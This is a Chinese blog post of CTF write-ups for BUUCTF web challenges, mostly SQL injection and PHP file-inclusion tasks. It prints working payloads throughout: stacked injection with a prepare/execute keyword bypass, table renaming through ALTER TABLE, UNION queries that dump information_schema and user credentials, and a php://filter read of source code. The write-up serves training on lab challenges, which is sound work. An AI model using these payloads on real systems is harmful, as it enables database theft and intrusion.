11-27 BUU做题记录

最新推荐文章于 2024-06-16 04:56:11 发布
最新推荐文章于 2024-06-16 04:56:11 发布
阅读量106 收藏
点赞数
分类专栏: CTF 文章标签: mysql 安全 sql 信息安全 openwrt
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/119534775
版权

[强网杯 2019]随便注

打开页面,进行提交,看下回显,url传参



v2-a66f1b06cd4e7171f067ffc5d459c1a6_b.jpg



v2-315ffa667f618d96f444460eb4c0eb79_b.jpg

v2-ba0efafec58cb9bc7f84c045c86ac85b_b.jpg

v2-8f054961569af909011301697a3983fd_b.jpg


就在我认为不过如此,这不就有手就行的时候。

当我测试了 大小写绕过,双写,/**/ /*!**/ ,sel<>ect,等多种方法,均绕不过。


v2-e4e4c0b54412958df06775131cbf61f7_b.jpg


因为

?inject=1 回显正常

?inject=1' 回显错误

?inject=1'#回显正常


尝试使用堆叠注入。 ------> 就是多条sql语句一起执行。以 ; 划分。

1';show databases;#


v2-4366f23e24f9ecc5226472489253259e_b.jpg


1';use supersqli;#

1';show tables;#


v2-5575d96df9ae3d7544e253e263ff9736_b.jpg


1’;show columns from `1919810931114514`;#

重点: 如果表名是纯数字需要用反引号包裹,不然不会出现回显

v2-19134c0b973ec8817cac95b56f529b0c_b.jpg


但最终查询flag还是需要用到select,。实在是技术太low。看了wp才明白。可以使用预编译的方式

1';set @flag = concat('sel','ect * from `1919810931114514`');prepare flag from @flag;execute flag;#

但是检测了关键词,不过strstr不过滤大小写。所以我们大写。


v2-44663629d7e7a6707d8ce923967841d4_b.jpg


1';SET @flag = concat('sel','ect * from `1919810931114514`');PREPARE flag from @flag;execute flag;#


v2-0e220d14e16e9c0c6c111364fa16466d_b.jpg


关于这段是什么意思,首先堆叠注入。我们拆开看,

1'; 单引号闭合,;开始堆叠注入。

SET @flag = concat('sel','ect * from `1919810931114514`'); 设置一个变量=后面查询。

PREPARE flag from @flag; 预处理一个语句,,

execute flag;# 执行语句

其中变量名和 预处理的flag 均为自定义。

concat() 拼接字符,将’sel’ 和 ‘etc * from …’ 进行拼接。


方法二:

这种解法思路清晰,间接明了。


思路,通过堆叠注入,我们可以看到以下信息,表名words 下的列名

当我们使用1’ or 1=1#的时候,他会爆出words下所有内容。


但不会爆出存放着flag的表的内容。


那我们将1919810931114514 修改为words名,

然后将列名flag修改为id。

再使用1’ or 1=1# 的话,flag不就出来了。



但肯定不能有两个一样的表名。所以我们先将words修改为其他名字。


基本sql语句。

alter table words rename to xxx; 修改words名

alter table `1919810931114514` rename to words; 将1919…修改为words

alter table users change flag id varchar(50); 将flag 改为id


最终生成payload

1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#


1’or 1=1#


v2-4031de7f62947e031b9655b8c7550ef4_b.jpg

v2-2f1e844283b4047dc5dfcde06c554eb8_b.jpg

[极客大挑战 2019]EasySQL

看着这个页面,看看上面那个简陋的,,这道题给我的感觉就是高大上,绝对不Easy。

尝试单引号,,尝试下 or 1=1 # ,

下面发生的事情才是令我震惊的。


v2-571508c7b241d0b47bab682a7eb2e777_b.jpg


就这么出来了。。flag。。我怕是假的,还去提交了, 没想到是真的竟然。


v2-a93e8fe40b99597f9adccccf23091bc6_b.jpg




[SUCTF 2019]EasySQL

这题刚打开,随手输了几个数字,一开始以为是盲注,因为它不报错,只有3种回显,


v2-f080fda8c74926fbc288bba9d1c8ab68_b.jpg


做sql注入重点在于它的查询语句是什么,如果我们知道了他的查询语句,那么就可以做出对应的payload。

而这一题,我输入除了0以外的任何数字,他的返回结果都只有一个。

那么他的查询语句有可能是这样子,(语法不对,意思到了)

表名通过堆叠注入获得。技术有限,仅查到了表名。

select POST[‘$query’],flag from Flag;

如果是这样,我们想让他查出flag的话,

可以让他select * 。

即select *,1 from 234 where array = 0;

payload: *,1


v2-2060e79acd0aa2ff91b9e1a0b19e90a0_b.jpg


这题最让我不解的就是,网上的大佬,竟然可以直接猜出他的sql查询语句是这样子的。

" s e l e c t " . sql = "select ".sql="select".post[‘query’]."||flag from Flag";


[极客大挑战 2019]Havefun

打开题目,啥也没有,先查看源代码,在最后发现这个


v2-90e8889ce3b5e94d4b7263a4b5bc434f_b.jpg


简单明了,我们直接payload:

?cat=dog


v2-a2a9f173bf9fa229d6765244335bb1a2_b.jpg

v2-08d6579427c8495cfe5a035c5efd573a_b.jpg


[极客大挑战 2019]Secret File

打开题目,啥也没有,查看源代码,发现./Archive_room.php,打开


v2-5e6121374c5839fdb28fa03ad7572c48_b.jpg



v2-d6ee4e5b39eab8773843f3d80374e961_b.jpg


点击SECRET 出现下面这个


v2-85685c711e24b6cc72c48946493d4821_b.jpg


很明显,有东西一闪而过,直接burp进行抓包。,然后打开secr3t.php


v2-83af2fc044c60a1b5b84ce2f43e2206b_b.jpg


文件包含,过滤../ tp input data ,最经典的,base64读源码

payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php


v2-fd3b4244211b2cc51f69a28ce015613b_b.jpg


解码得到flag


v2-397e12b7dd6a801657bdb8b83430d63a_b.jpg



v2-a14ad81e188389dd90b15ce25eeeb72e_b.jpg


[ACTF2020 新生赛]Include


打开题目,有个链接,,打开


v2-089f375c80eff73e51316237258d4171_b.jpg



v2-00101545c06bf38f7c59abcb690a6e71_b.jpg


直接base64读源码,文件包含,懂得都懂。

v2-458544730dedfcd5b74378b141798dce_b.jpg


[极客大挑战 2019]LoveSQL


多么熟悉的登录框,直接 1’ or 1=1 #


v2-f5edeb3f9891bea28bb823e2d26754b2_b.jpg


出金了。账号admin ,密码,,我一看直接md5 不对。然后尝试登陆。 发现他的密码真是这个。。



v2-a0b298183e01102750cea5797a57d3b6_b.jpg


进行注入 order by 3 回显

?username=1&password=1%27+order+by+3%23


v2-66799ae5b8e39cab94c877191f9b6758_b.jpg


order by 4 回显这个。证明3列。直接查数据库,查表名,列名。数据。一套走下来就行了


v2-6034f25e10934c059d606555d336052b_b.jpg


-1' union select 1,2,3#


v2-9ece7f4e47a2d7c0f07b31e7c0569010_b.jpg


-1' union select 1,version(),database()#


v2-a2fc110de4929a01986848e70c00a9f8_b.jpg


-1' union select 1,2,group_concat(table_name,'---') from information_schema.tables where table_schema='geek'#


v2-975a450f89514e5b7a86a5310f9c3a52_b.jpg


-1' union select 1,2,group_concat(column_name,'---') from information_schema.columns where table_name='l0ve1ysq1'#

看重列名好像没有flag,两个表名都是同样内容,猜测flag在数据中,继续读取。


v2-d42807a3ac8fc7e30c91d657491069c0_b.jpg


-1' union select 1,2,group_concat(id,'---',username,'---',password) from l0ve1ysq1#

读到flag


v2-e8fc58ab6d61f6580dd9b78fa42372da_b.jpg

SwBack
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buu 水题记录(二)
pwnyuan's blog
11-08 1331
buuctf 刷题记录(二)BeforeCrypto还原大师传感器CipherrotUnencode密码学的心声这是什么一张谍报RSARSA2RSA3rsa 2RSA5RSAROLLDangerous RSASameMod[AFCTF2018]Morse[NCTF2019]Keyboard[GXYCTF2019]CheckIn[HDCTF2019]basic_rsa[HDCTF2019]bbbbbbrsa Before Crypto 还原大师 TASC?O3RJMV?WDJKX?ZM E903???4D
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
11-28 BUU做题记录
SwBack的博客
11-29 223
2020-11-28[ACTF2020 新生赛]Exec打开直接ping,一般所在目录没有flag,那就在根目录。看到flag,直接cat , [GXYCTF2019]Ping Ping Ping打开页面,直接ping,然后ls,。发现flag.phpcat flag.php读取 出现错误。空格被bang绕过空格方法有很多,一个个试都可以$IFS$9 <> , %09 ${I...
BUU 2020-11-26-27做题记录
SwBack的博客
11-28 223
2020-11-26 [HCTF 2018]WarmUp 打开题目,查看源代码 在代码中发现了hint.php,打开查看,发现flag所在位置。 ok,返回审计代码,如下图 重点,一个这里 另一个就是这里。 就是提取 $page中 从索引0开始,一直到 第一次出现 ? 的位置。 就是说,不管我们输入的是 back.php?XXXXX 还是back.php?back 都只会输出 back.php 如果代码看不懂,你也能够做出来,只要你碰巧看过CVE-2018-12613 的利用方式。 2020-
BUU-SQL注入做题记录
DoubleLiii的博客
02-01 198
做题记录
cuihua 2022.4.11-17BUU刷题记录
cuihua的博客
04-17 848
25[MRCTF2020]摇滚DJ 1.题目概述 2.解题过程 听了一下,真难听, audacity打开,波形是平的 和前面那道题有点像 kali的qsstv工具 安装qsstv apt install qsstv 安装成功后,在终端下输入qsstv,自动打开 下载好后,在终端输入qsstv,系统自动打开qsstv,然后点击Options->configuration->sound->sound input->from file 点击OK,然后点击这个按钮,选择要解码的文
2021-08-27bugku做题记录16——你以为是md5吗
HaHa的博客
08-27 326
第16道题——Crypto——你以为是md5吗 用md5解码,无法识别。 评论区说和md5的构成有关,去看看好了。 由上图可知,md5可有32位字符组成,并且其组成需由0-9和a-f组成,观察题目所给信息 bci177a7a9c7udf69c248647b4dfc6fd84o 可以发现,他有35位,并且其中的iou是不符合的,所以删去,然后用MD5在线解码得到答案 bc177a7a9c7df69c...
BUU OJ 做题记录
weixin_30920597的博客
08-08 318
buu oj题库的题质量很高,这里记录一下 1.WarmUp 代码审计 查看源码发现提示source.php和hint.php source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$p...
BUUCTF做题Upload-Labs记录pass-11~pass-20
Goodric的博客
07-26 602
白名单上传:`'jpg','png','gif'` 上传抓包可以看到url中的结构。
BUUCTF 个人做题记录【6-27
qq_61620566的博客
06-27 1145
只是一个站在巨人的肩膀看世界的小孩
joinUs-buu2018:h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信qq分享
05-02
joinUs-buu2018 h5邀请函、招商加盟、boudle整屏滚动 + animation 动画库 + 音乐播放与暂停 + 申请加盟数据提交 + 微信/qq分享 #预览地址
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
BUU刷题-Reveser-FlareOn5_Web2.0(WebAssembly逆向分析)
MySQL】(基础篇十二) —— 子查询
dao_cao_renshuai的博客
06-15 371
本文介绍什么是子查询以及如何使用它们。
MySQL】索引(上)
开心星人的博客
06-11 837
索引是一种用于快速查询和检索数据的数据结构,排序好的数据结构。 优点:加快检索速度;通过创建唯一性索引,可以保证行数据的唯一性;通过索引列对数据进行排序,降低数据排序的成本,降低CPU的消耗 缺点:创建和维护索引需要耗费时间,本身存储也要耗费一定空间不同引擎对索引的支持情况 哈希表、有序数组、B+树、B树、红黑树,二叉树哈希表:只适用于等值查询的场景,用这种索引做不了范围查询,必须全表扫描。查询效率高有序数组:有序数组在等值查询和范围查询场景中的性能就都非常优秀,但是一旦更新数据就得挪动后面的元素,成本太高
LeetCode //MySQL - 175. Combine Two Tables
Made in Code
06-13 868
【代码】LeetCode //MySQL - 175. Combine Two Tables。
Windows10 MySQL(8.0.37)安装与配置
最新发布
XLB
06-16 392
新建变量:%MYSQL_HOME%\bin 点击确定,也可以单独在path设置成一条:C:\MySQL\mysql-8.0.37-winx64\bin即可。C:\Mysql\mysql-8.0.37-winx64 (安装路径)工具栏搜索:高级系统设置,或者鼠标右键此电脑>属性>高级系统设置。保存,将my.txt文件后缀改为.ini。编辑my.txt文件,输入以下内容。系统变量找到:Path 点击编辑。解压文件,解压到你想要的位置。(没错就是要点三个确定)新建my.txt文件。点击确定,确定,确定。
buu upload-labs 11
09-19
引用、和是关于文件上传功能的源代码。这些源代码都是用于处理上传文件的功能,但每个源代码都有一些细微的差异。比如,引用和使用了文件的扩展名来确定文件类型,而引用则使用了文件的MIME类型来确定文件类型。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值